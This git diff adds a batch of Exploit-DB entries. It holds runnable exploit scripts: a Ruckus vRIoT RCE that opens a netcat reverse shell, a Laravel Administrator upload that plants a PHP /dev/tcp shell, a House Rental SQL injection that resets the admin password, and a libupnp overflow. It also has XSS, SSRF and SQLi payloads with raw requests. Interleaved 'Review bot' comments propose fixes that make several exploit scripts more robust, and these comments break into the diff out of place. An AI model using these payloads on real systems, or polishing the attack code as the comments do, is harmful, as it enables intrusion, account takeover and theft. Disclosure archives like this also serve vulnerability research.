diff --git a/exploits/hardware/webapps/49110.py b/exploits/hardware/webapps/49110.py new file mode 100755 index 000000000..25e34aa56 --- /dev/null +++ b/exploits/hardware/webapps/49110.py 
@@ -0,0 +1,101 @@ +# Product: Ruckus IoT Controller (Ruckus vRIoT) +# Version: <= 1.5.1.0.21 +# Vendor: https://support.ruckuswireless.com/ +# Vulnerability: Command Injection & Broken Authentication +# References: CVE-2020-26878 +# Discovered by: Juan Manuel Fernandez +# Exploit Title: Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution +# Exploit Author: Emre SUREN +# Disclosure Date: 2020-10-26 +# Tested on: Appliance + +#!/usr/bin/python +# -*- coding: utf-8 -*- + +import requests, urllib3, sys +from Crypto.Cipher import AES +from base64 import b64encode, b64decode +from colorama import Fore +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def listen(lhost, lport): + opt = str(raw_input(Fore.YELLOW + "[?] Listening " + lhost + " " + lport + " (i.e. netcat) ? (y/n): ")) + if opt == "y": + return True + else: + return False + +def generatePayload(lhost, lport): + + payload="; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport+" >/tmp/f; #" + + return payload + +def generateMagicToken(): + + enc_dec_method = 'utf-8' + salt = 'nplusServiceAuth' + salt = salt.encode("utf8") + str_key = 'serviceN1authent' + str_to_enc = 'TlBMVVMx' + + return encrypt(enc_dec_method, salt, str_key, str_to_enc) + +def encrypt(enc_dec_method, salt, str_key, str_to_enc): + + aes_obj = AES.new(str_key, AES.MODE_CFB, salt) + hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8")) + mret = b64encode(hx_enc).decode(enc_dec_method) + + return mret + +def execCmd(rhost, rport, lhost, lport): + + payload = generatePayload(lhost, lport) + post_data = { + "username": payload, + "password": "test" + } + print(Fore.BLUE + "[*] Payload\t: " + payload) + + token = generateMagicToken() + headers = { + "Authorization": token + } + + rpath = "/service/v1/createUser" + uri = 'https://' + rhost + ":" + rport + rpath + + r = requests.post(uri, json=post_data, headers=headers, verify=False) + print(Fore.BLUE + "[*] Request sent") + + if 
r.status_code == 200: + print(Fore.GREEN + "[+] Successful. Check for the session...") + else: + print(Fore.RED + "[X] Failed. Check for the response...") + print(Fore.BLUE + "[*] Response\t: " + r.text) + sys.exit() + +def main(): + + if (len(sys.argv) != 5): + print("[*] Usage: ruckus151021.py ") + print("[*] -> Target IP") + print("[*] -> Target Port") + print("[*] -> Attacker IP") + print("[*] -> Attacker Port") + print("[*] Example: python {} 192.168.2.25 443 192.168.2.3 9001".format(sys.argv[0])) + exit(0) + + rhost = sys.argv[1] + rport = sys.argv[2] + lhost = sys.argv[3] + lport = sys.argv[4] + + if not listen(lhost, lport): + print(Fore.RED + "[!] Please listen at port {} to connect a reverse session !".format(lport)) + else: + execCmd(rhost, rport, lhost, lport) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/linux/dos/49119.py b/exploits/linux/dos/49119.py new file mode 100755 index 000000000..fc814a710 --- /dev/null +++ b/exploits/linux/dos/49119.py @@ -0,0 +1,18 @@ +# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS) +# Date: 2020-08-20 +# Exploit Author: Patrik Lantz +# Vendor Homepage: https://pupnp.sourceforge.io/ +# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download +# Version: <= 1.6.6 +# Tested on: Linux +# CVE : CVE-2012-5958 + +import socket + +payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:" +payload += "A"*324 + "BBBB" +payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n" + +byte_message = bytes(payload) +s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +s.sendto(byte_message, ("239.255.255.250", 1900)) \ No newline at end of file diff --git a/exploits/multiple/local/49108.txt b/exploits/multiple/local/49108.txt new file mode 100644 index 000000000..aa42c62d4 --- /dev/null +++ b/exploits/multiple/local/49108.txt 
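Review bot: The `#!/usr/bin/python` and `# -*- coding: utf-8 -*-` lines come after ten header comment lines, so the shebang is inert and does not select an interpreter when the file is executed directly; since `listen()` calls `raw_input`, the script runs only under Python 2, which the header's `# Tested on: Appliance` does not convey. Add a header line such as `# Tested with: Python 2.7` so the interpreter requirement is explicit. As a point of style, `listen()` can return the comparison directly, `return opt == "y"`, instead of the four-line if/else.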
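Review bot: `bytes(payload)` converts a `str` without an encoding, which only behaves as intended on Python 2, and the header (`# Tested on: Linux`) does not name the interpreter; add a line such as `# Tested on: Linux, Python 2.7`. The version metadata is inconsistent: the title says `libupnp 1.6.18` while `# Version: <= 1.6.6` and the Software Link point at 1.6.6, and the `files_exploits.csv` entry in this commit repeats the 1.6.18 title, so one of them should be corrected. The UDP socket is also never closed; add `s.close()` after the `sendto` call.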
@@ -0,0 +1,26 @@ +# Exploit Title: SAP Lumira 1.31 - Stored Cross-Site Scripting +# Date: 13.08.2020 +# Exploit Author: Ilca Lucian Florin +# Vendor Homepage: https://www.sap.com +# Software Link: SAP Lumira +# Version: <= 1.31 +# Tested on: Windows 7 / Windows 10 / Internet Explorer 11 / Google Chrome 84.0.4147.105 + +# Vulnerable System: https://system/BOE/BI + +# Reproduce Cross Site Scripting (XSS): + +1. Select Web Intelligence Button +2. Wait for SAP Business Objects to load complete +3. CTRL +N or click on New Document +4. Create an empty document +5. Select new variable +6. Select random name for the variable +7. Add the XSS vectors from evidence +8. Open variable tab and click on new created variable name + +# Cross Site Scripting (XSS) Vectors Used: + +• ">

123

+• \ No newline at end of file diff --git a/exploits/multiple/webapps/49113.py b/exploits/multiple/webapps/49113.py new file mode 100755 index 000000000..51f193f44 --- /dev/null +++ b/exploits/multiple/webapps/49113.py 
@@ -0,0 +1,87 @@ +# Exploit Title: Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF +# Date: 2020-07-30 +# Author: Julien Ahrens +# Vendor Homepage: https://www.acronis.com +# Version: 12.5 Build 16341 +# CVE: CVE-2020-16171 + +VERSIONS AFFECTED +==================== +Acronis Cyber Backup v12.5 Build 16327 and probably below. + +VULNERABILITY DETAILS +======================== +All API endpoints running on port 9877 under "/api/ams/" whereof some are +reachable without authentication, do accept an additional custom header called +"Shard": + +def get_ams_address(headers): + if 'Shard' in headers: + [...] + return headers.get('Shard') # Mobile agent >= ABC5.0 + +The value of this header is afterwards to construct a separate web request send +by the application using a urllib.request.urlopen call: + +def make_request_to_ams(resource, method, data=None): + port = config.CONFIG.get('default_ams_port', '9892') + uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource) + logging.debug('Making request to AMS %s %s', method, uri) + headers = dict(request.headers) + del headers['Content-Length'] + if not data is None: + headers['Content-Type'] = 'application/json' + req = urllib.request.Request(uri, + headers=headers, + method=method, + data=data) + resp = None + try: + resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT) + except Exception as e: + logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e)) + return resp + +This can be abused to conduct SSRF attacks against otherwise unreachable internal hosts +of Acronis services that are bound to localhost such as the "NotificationService" running +on 127.0.0.1:30572 with a request header like: + +Shard: localhost:30572/external_email? + +For more details, see the referenced blog post. + +RISK +======= +The vulnerability can be used by an unauthenticated or authenticated attacker +to query otherwise unreachable internal network resources. 
As demonstrated in +the corresponding blog post, using this vulnerability, it is possible to i.e. +(amongst others) send out fully customized emails or modify the application's +resource settings. + + +7. SOLUTION +=========== +Update to v12.5 Build 16342 + + +8. REPORT TIMELINE +================== +2020-07-30: Discovery of the vulnerability +2020-07-30: Since the vulnerability is fixed in Cyber Protect: Sent out a + request to the Vendor to check whether Cyber Backup is EOL and users + are advised to migrate to Cyber Protect instead. +2020-07-30: CVE requested from MITRE +2020-07-31: MITRE assigns CVE-2020-16171 +2020-07-31: Public Disclosure date set to 2020-08-14 +2020-08-04: Vendor asks for a 90 days extension +2020-08-04: Extension not granted because there is a fix available already. Public disclosure + date set to 2020-09-14 +2020-09-05: Asking vendor about the status of the fix +2020-09-08: Vendor states that a fix has been backported to Cyber Backup 12.5 under the + reference ABR-202103 +2020-09-14: Public disclosure + +9. REFERENCES +============= +https://www.rcesecurity.com/2020/09/CVE-2020-16171-Exploiting-Acronis-Cyber-Backup-for-Fun-and-Emails/ +https://dl.acronis.com/u/backup/rn/12.5/user/en-US/AcronisBackup12.5_relnotes.htm \ No newline at end of file diff --git a/exploits/php/webapps/49107.txt b/exploits/php/webapps/49107.txt new file mode 100644 index 000000000..b7cecddf2 --- /dev/null +++ b/exploits/php/webapps/49107.txt 
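Review bot: The file is a plain-text advisory (section headings, a report timeline, quoted server-side code) but is added as `exploits/multiple/webapps/49113.py` with mode 100755, so it neither parses as Python nor can be executed; a `.txt` name without the executable bit would match the other advisories in this commit such as `49107.txt` and `49114.txt`. The build metadata is also inconsistent: the title says `12.5 Build 16341`, the VERSIONS AFFECTED section says `Build 16327 and probably below`, and the SOLUTION section names `Build 16342`, so the affected build should be stated once and consistently. The section numbering jumps from the unnumbered RISK section to `7. SOLUTION`; either number every section or none.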
@@ -0,0 +1,34 @@ +# Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting +# Date: 11/27/2020 +# Exploit Author: Ilca Lucian Florin +# Vendor Homepage: http://demo.themeftc.com/wibar +# Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798 +# Version: 1.1.8 +# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge + +The WordPress theme contains Brands feature which is vulnerable to stored +cross site scripting. The logo URL parameter is vulnerable to cross site +scripting. The following vector was used for testing XSS: ">. + +In order to reproduce the vulnerability, please follow the next steps: + +1. Log in as editor/administrator/contributor/author: +https://website.com/wp-admin +2. Go to Brands section +3. Click add new brand and add a custom brand title +4. The vulnerable parameter is: Logo URL / +5. Add the following payload: "> , where +base64 == alert(document.domain) +6. Publish +7. The alert will pop up when a user will visit the website on +https://website.com/brand/vulnerablebrand. + +Evidence: + +1. https://ibb.co/1fpYJWN +2. https://ibb.co/S7j5Sgd + +C.V.S.S Score: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L / 7.5 High \ No newline at end of file diff --git a/exploits/php/webapps/49109.txt b/exploits/php/webapps/49109.txt new file mode 100644 index 000000000..b33eeb888 --- /dev/null +++ b/exploits/php/webapps/49109.txt 
@@ -0,0 +1,44 @@ +# Exploit Title: WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting +# Google Dork: "WonderCMS" +# Date: 2020-11-27 +# Exploit Author: SunCSR (Sun* Cyber Security Research) +# Vendor Homepage: https://www.wondercms.com/ +# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip +# Version: 3.1.3 +# Tested on: Ubuntu 20.10 + +Steps-To-Reproduce: +1. Login and select button setting +2. Go to tab Files, and upload file contains payload xss with extension like html, svg, htm +3. Go to http://target.lc/data/files/ and trigger XSS + +POST /home HTTP/1.1 +Host: wordpress.lc:8081 +Content-Length: 372 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://wordpress.lc:8081 +Content-Type: multipart/form-data; +boundary=----WebKitFormBoundary6EKP5vjUNS5Icgql +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like +Gecko) Chrome/87.0.4280.66 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://wordpress.lc:8081/ +Accept-Encoding: gzip, deflate +Accept-Language: vi,vi-VN;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: PHPSESSID=74me71gverejuaf2bns2n5fpkf +Connection: close + +------WebKitFormBoundary6EKP5vjUNS5Icgql +Content-Disposition: form-data; name="uploadFile"; filename="xss.html" +Content-Type: text/html + + +------WebKitFormBoundary6EKP5vjUNS5Icgql +Content-Disposition: form-data; name="token" + +5d715f2aebdf138f4968fce8dcd3703778c6fb5a1abea40e27eb9280079474da +------WebKitFormBoundary6EKP5vjUNS5Icgql-- + +-- \ No newline at end of file diff --git a/exploits/php/webapps/49112.py b/exploits/php/webapps/49112.py new file mode 100755 index 000000000..906209983 --- /dev/null +++ b/exploits/php/webapps/49112.py 
@@ -0,0 +1,54 @@ +# Exploit title: Laravel Administrator 4 - Unrestricted File Upload (Authenticated) +# Author: Victor Campos and Xavi Beltran +# Contact: vcmartin@protonmail.com +# Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/ +# Date: 25/3/2020 +# Software link: https://github.com/FrozenNode/Laravel-Administrator/ +# Version : 4 +# Tested on: Laravel-Administrator 4 +# CVE : CVE-2020-10963 + +#!/usr/bin/env python + +import requests,json,traceback +from requests.auth import HTTPBasicAuth + + +#Parameters to be set up (ENTER YOUR VALUES) +#=========================================== +# Listener IP and port +ip = "" +port = "" +#Admin credentials +user = "" +password = "" +#URLs of the web application +domain = "" # For example "https://www.example.com" +login_url = "" # For example "/user/login" +fileupload_url = "" # For example "/admin/categories/image/file_upload" +uploaded_files_url = "" # For example "/categories/images" + + + +#Reverse shell payload (DO NOT MODIFY THIS SECTION) +#================================================== +#GIF file header +shell = "GIF89a\r\n" +#php reverse shell +shell += "\x3c?php\r\nexec(\"/bin/bash -c \'bash -i \x3e /dev/tcp/" + ip + "/" + port + " 0\x3e&1\'\");?\x3e\r\n" + + +with requests.Session() as s: + try: + print("\n[+] Logging into the panel") + s.post(domain + login_url, data={'email':user,'password':password,'remember': '1'}) + print("[+] Uploading the malicious file") + r = s.post(domain + fileupload_url, files={'name':'Picture.png','file': ('test.php',shell)}) + print("[+] Response text:") + #print(r.text) + shell_file = (json.loads(r.text))["filename"] + print("[+] Name of uploaded file: " + shell_file) + print("\n[+] Executing the reverse shell on " + ip + ":" + port + "...") + r = s.get(domain + uploaded_files_url + '/' + shell_file) + except Exception as e: + print(str(traceback.format_exc())) \ No newline at end of file 
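Review bot: The response of the login call `s.post(domain + login_url, ...)` is discarded, so a failed login is not detected until `json.loads(r.text)["filename"]` fails on the later response, and the `except Exception` handler then prints a traceback that does not point at the login as the cause; bind the response and check it before continuing, e.g. `r = s.post(...)` followed by `r.raise_for_status()` (a login page may still answer 200 on failure, so checking the body is presumably also needed). The `#!/usr/bin/env python` line is on line 11, after the header comments, so it is inert; name the tested interpreter in the header instead. The `files_exploits.csv` entry in this commit credits only `Xavi Beltran` while the header says `Victor Campos and Xavi Beltran`; align the two.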
diff --git a/exploits/php/webapps/49114.txt b/exploits/php/webapps/49114.txt new file mode 100644 index 000000000..0e123c160 --- /dev/null +++ b/exploits/php/webapps/49114.txt @@ -0,0 +1,54 @@ +# Exploit Title: Moodle 3.8 - Unrestricted File Upload +# Date: 2019-09-08 +# Exploit Author: Sirwan Veisi +# Vendor Homepage: https://moodle.org/ +# Software Link: https://github.com/moodle/moodle +# Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4... +# Tested on: Moodle Version 3.8 +# CWE : CWE-434 + +I found an Unrestricted Upload vulnerability for Moodle version 3.8 , that +allows the attacker to upload or transfer files of dangerous types. + + +Example exploitation request: + +POST /repository/repository_ajax.php?action=upload HTTP/1.1 +Host: VulnerableHost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) +Gecko/20100101 Firefox/80.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; +boundary=---------------------------38898830537874132223151601680 +Content-Length: 2763 +Origin: https://VulnerableHost +Connection: close +Referer: https://VulnerableHost/user/files.php +Cookie: MoodleSession=bpn90khjdh7mq4phs8i9r0caai +Upgrade-Insecure-Requests: 1 + +-----------------------------38898830537874132223151601680 +Content-Disposition: form-data; name="repo_upload_file"; +filename="image.php" +Content-Type: image/jpeg + +GIF89a; + + +----------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/49115.txt b/exploits/php/webapps/49115.txt new file mode 100644 index 000000000..78e58c1c6 --- /dev/null +++ b/exploits/php/webapps/49115.txt 
@@ -0,0 +1,42 @@ +# Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated) +# Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang +# Google Dork: N/A +# Date: 2020-08-24 +# Vendor Homepage: https://accesspressthemes.com +# Software Link: https://wordpress.org/plugins/accesspress-social-icons/ +# Version: <= 1.7.9 +# Tested on: Ubuntu 18.04 + +Description: +A blind SQL injection vulnerability is present in Ajax load more. + +prefix . "aps_social_icons"; +$icon_sets = $wpdb->get_results("SELECT * FROM $table_name where si_id = +$si_id"); + +POC: +POST /wordpress/index.php?rest_route=%2Fwp%2Fv2%2Fposts%2F66&_locale=user +HTTP/1.1 +Host: pwnme.me +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 +Firefox/79.0 +Accept: application/json, */*;q=0.1 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://pwnme.me/wordpress/wp-admin/post.php?post=66&action=edit +X-WP-Nonce: 514cd2ab3f +X-HTTP-Method-Override: PUT +Content-Type: application/json +Origin: http://pwnme.me +Content-Length: 103 +Connection: close +Cookie: wp-settings-time-2=1597912773; +wordpress_test_cookie=WP+Cookie+check; +wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=author%7C1598405206%7Cwp7Nu56SQz9nIWmkqZr94WFIpGZ6VfcTT5KaYPUULWe%7C3c4c3a80cbfd049b95b04a6104ded9b05f33f8a9900ccec818d5aa43c7102c79; +wp-settings-time-3=1598234126 + +{"id":66,"content":"\n[aps-social id=\"4 and +sleep(5)\"]\n"} \ No newline at end of file diff --git a/exploits/php/webapps/49117.txt b/exploits/php/webapps/49117.txt new file mode 100644 index 000000000..c13a419be --- /dev/null +++ b/exploits/php/webapps/49117.txt 
@@ -0,0 +1,94 @@ +# Exploit Title: House Rental 1.0 - 'keywords' SQL Injection +# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) +# Date: 2020-08-07 +# Vendor Homepage: https://projectworlds.in +# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip +# Version: 1.0 +# Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7 +# CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') +# OWASP Top Ten 2017: A1:2017-Injection +# CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9 +# CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H +# Vulnerability Description: +# House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability allowing remote attackers +# to execute arbitrary code on the hosting webserver via sending a malicious POST request. +# Vulnerable Source Code: +# /config/config.php +# 11 try { +# 12 $connect = new PDO("mysql:host=".dbhost."; dbname=".dbname, dbuser, dbpass); +# 13 $connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); +# /index.php +# 5 if(isset($_POST['search'])) { +# 7 $keywords = $_POST['keywords']; +# 11 $keyword = explode(',', $keywords); +# 12 $concats = "("; +# 13 $numItems = count($keyword); +# 15 foreach ($keyword as $key => $value) { +# 17 if(++$i === $numItems){ +# 18 $concats .= "'".$value."'"; +# 19 }else{ +# 20 $concats .= "'".$value."',"; +# 23 $concats .= ")"; +# 47 $stmt = $connect->prepare("SELECT * FROM room_rental_registrations_apartment WHERE country IN $concats OR country IN $loc OR state IN $concats OR state IN $loc OR city IN $concats OR city IN $loc OR address IN $concats OR address IN $loc OR rooms IN $concats OR landmark IN $concats OR landmark IN $loc OR rent IN $concats OR deposit IN $concats"); +# 48 $stmt->execute(); + +import requests, sys, re, json +from colorama import Fore, Back, Style + 
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) +F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] +S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] +ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0] +err = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0] + + +def sig(): + SIG = F[2]+" .-----.._ ,--. "+F[5]+" .__ .__________\n" + SIG += F[2]+" | .. > "+F[4]+"___"+F[2]+" | | .--. "+F[5]+" | |__ ___.__. __| _\\_____ \\ ______ ____ ____\n" + SIG += F[2]+" | |.' ,'"+F[4]+"-'"+F[2]+"* *"+F[4]+"'-."+F[2]+" |/ /__ __ "+F[5]+" | | < | |/ __ | _(__ < / ____/ __ _/ ___\\\n" + SIG += F[2]+" | <"+F[4]+"/ "+F[2]+"* * *"+F[4]+" \\ "+F[2]+"/ \\/ \\ "+F[5]+" | Y \\___ / /_/ | / \\\\___ \\\\ ___\\ \\___\n" + SIG += F[2]+" | |> ) "+F[2]+"* *"+F[4]+" / "+F[2]+"\\ \\ "+F[5]+" |___| / ____\____ |/______ /____ >\\___ \\___ >\n" + SIG += F[2]+" |____..- "+F[4]+"'-.._..-'"+F[2]+"_|\\___|._..\\___\\"+F[5]+" \\/\\/ \\/ \\/ \\/ \\/ \\/\n" + SIG += F[2]+" "+F[2]+"_______github.com/boku7_____ "+F[5]+" _______github.com/hyd3sec____\n_"+F[0]+S[0] + return SIG + + + +def header(): + head = S[3]+F[2]+' --- House Rental v1.0 | SQL Injection - Change Admin Password ---\n'+S[0] + return head + +def formatHelp(STRING): + return S[3]+F[2]+STRING+S[0] + +if __name__ == "__main__": + print(header()) + print(sig()) + if len(sys.argv) != 2: + print(err+formatHelp("Usage:\t python %s " % sys.argv[0])) + print(err+formatHelp("Example:\t python %s 'http://172.16.65.130/home-rental/'" % sys.argv[0])) + sys.exit(-1) + SERVER_URL = sys.argv[1] + if not re.match(r".*/$", SERVER_URL): + SERVER_URL = SERVER_URL+'/' + INDEX_URL = SERVER_URL + 'index.php' + EXECUTE_URL = SERVER_URL + 'execute.php' + LOGIN_URL = SERVER_URL + 'auth/login.php' + s = requests.Session() + get_session = s.get(INDEX_URL, verify=False) + pdata = {'keywords':'1337\') UNION SELECT all 
\'1,UPDATED,ADMIN,PASSWORD,TO,boku,aaaaaa,city,landmark,rent,deposit,plotnum,apartName,aptNum,rooms,floor,purpose,own,area,address,accomd,prepare("UPDATE users set password=\\\'17d8e2e8233d9a6ae428061cb2cdf226\\\' WHERE username=\\\'admin\\\'");$stmt->execute();?>,image,open,other,1,2020-08-01 14:42:11,2020-08-01 14:42:11,1\' into OUTFILE \'../../htdocs/home-rental/execute.php\' -- boku', 'location':'','search':'search'} + SQLi = s.post(url=INDEX_URL, data=pdata, verify=False) + if SQLi.status_code == 200: + print(ok+"Sent "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" POST Request to "+F[5]+S[3]+INDEX_URL+F[0]+S[0]+" with "+F[2]+S[2]+"payload"+F[0]+S[0]+":") + print(S[3]+F[2]+json.dumps(pdata, sort_keys=True, indent=4)+F[0]+S[0]) + else: + print(err+'Cannot send payload to webserver.') + sys.exit(-1) + try: + print(ok+"Executing "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" payload to change "+F[2]+S[2]+"admin password"+F[0]+S[0]) + EXECUTE = s.get(url=EXECUTE_URL, verify=False) + except: + print(err+'Failed to connect to '++F[2]+S[3]+EXECUTE_URL+F[0]+S[0]+'to execute payload') + sys.exit(-1) + print(ok+F[2]+S[3]+"SQL Injection payload executed!"+F[0]+S[0]) + print(ok+F[2]+S[3]+"Login at "+F[5]+S[3]+LOGIN_URL+F[0]+S[0]+" with creds: "+F[2]+S[2]+"admin:boku"+F[0]+S[0]) \ No newline at end of file diff --git a/exploits/php/webapps/49121.txt b/exploits/php/webapps/49121.txt new file mode 100644 index 000000000..e70daf6c7 --- /dev/null +++ b/exploits/php/webapps/49121.txt 
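Review bot: The message in the `except:` branch, `'Failed to connect to '++F[2]+S[3]+EXECUTE_URL...`, applies unary plus to a string (`+F[2]`) and raises `TypeError`, so the intended error line is never printed and the original connection error is replaced by an unrelated traceback; drop the extra `+` and add the missing separator: `print(err+'Failed to connect to '+F[2]+S[3]+EXECUTE_URL+F[0]+S[0]+' to execute payload')`. The bare `except:` also catches `KeyboardInterrupt`; `except requests.RequestException:` names what the `s.get` call can raise. `get_session` is assigned and never read, and the file carries Python code under a `.txt` name although the header says `Python 2.7`.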
@@ -0,0 +1,46 @@ +# Exploit Title: ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting +# Date: 2020-08-22 +# Exploit Author: Vyshnav NK +# Vendor Homepage: https://www.elkarbackup.org/ +# Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation +# Version: 1.3.3 +# Tested on: Linux + +Reproduction Steps: + +1 - Go to the elakarbackup/login +2 - Login with default credentials +3 - Go to Policies >> Action >> Edit any of the existing Policies >> Insert XSS Payload in Paramter "Policy[name] and Policy[Description]" +4 - Click on Save +5 - We can see the Javacript Code executed Sucessfully + + +XSS Attack vectors : + +"> +"> + + + +Request : + +POST /policy/1 HTTP/1.1 +Host: ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 1123 +Origin: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com +Connection: close +Referer: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com/policy/1? 
+Cookie: PHPSESSID=03e0bcfa5864ffe758916b5e171c1505 +Upgrade-Insecure-Requests: 1 + +Policy%5Bname%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Bdescription%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BhourlyHours%5D=12%3A00%7C15%3A00%7C21%3A00&Policy%5BhourlyDaysOfMonth%5D=&Policy%5BhourlyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BhourlyMonths%5D=&Policy%5BhourlyCount%5D=0&Policy%5BdailyHours%5D=21%3A00&Policy%5BdailyDaysOfMonth%5D=&Policy%5BdailyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BdailyMonths%5D=&Policy%5BdailyCount%5D=5&Policy%5BweeklyHours%5D=21%3A00&Policy%5BweeklyDaysOfMonth%5D=&Policy%5BweeklyDaysOfWeek%5D=1&Policy%5BweeklyMonths%5D=&Policy%5BweeklyCount%5D=4&Policy%5BmonthlyHours%5D=21%3A00&Policy%5BmonthlyDaysOfMonth%5D=1&Policy%5BmonthlyDaysOfWeek%5D=&Policy%5BmonthlyMonths%5D=&Policy%5BmonthlyCount%5D=12&Policy%5ByearlyHours%5D=21%3A00&Policy%5ByearlyDaysOfMonth%5D=&Policy%5ByearlyDaysOfWeek%5D=&Policy%5ByearlyMonths%5D=&Policy%5ByearlyCount%5D=0&Policy%5Bexclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Binclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BsyncFirst%5D=1&Policy%5B_token%5D=B6JELPCVSHiZrMvyEeeBdRMLYSKBWfUMUwBeLWw8XpI&weekly-day=on + + +Response : + +
?" class="delete-policy" action="/policy/1/delete" method="POST" style="display:inline"> \ No newline at end of file diff --git a/exploits/php/webapps/49122.txt b/exploits/php/webapps/49122.txt new file mode 100644 index 000000000..11898f31d --- /dev/null +++ b/exploits/php/webapps/49122.txt @@ -0,0 +1,37 @@ +# Exploit Title: Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated) +# Google Dork: "Powered By Best Support System" +# Date: 2020-08-23 +# Exploit Author: Ex.Mi [ https://ex-mi.ru ] +# Vendor: Appsbd [ https://appsbd.com ] +# Software Version: 3.0.4 +# Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317 +# Tested on: Kali Linux +# CVE: CVE-2020-24963 +# CWE: CWE-79 + + +[i] :: Info: + +An Authenticated Persistent XSS vulnerability was discovered in the +Best Support System, tested version — v3.0.4. + + +[$] :: Payloads: + +13"-->">'` -- `
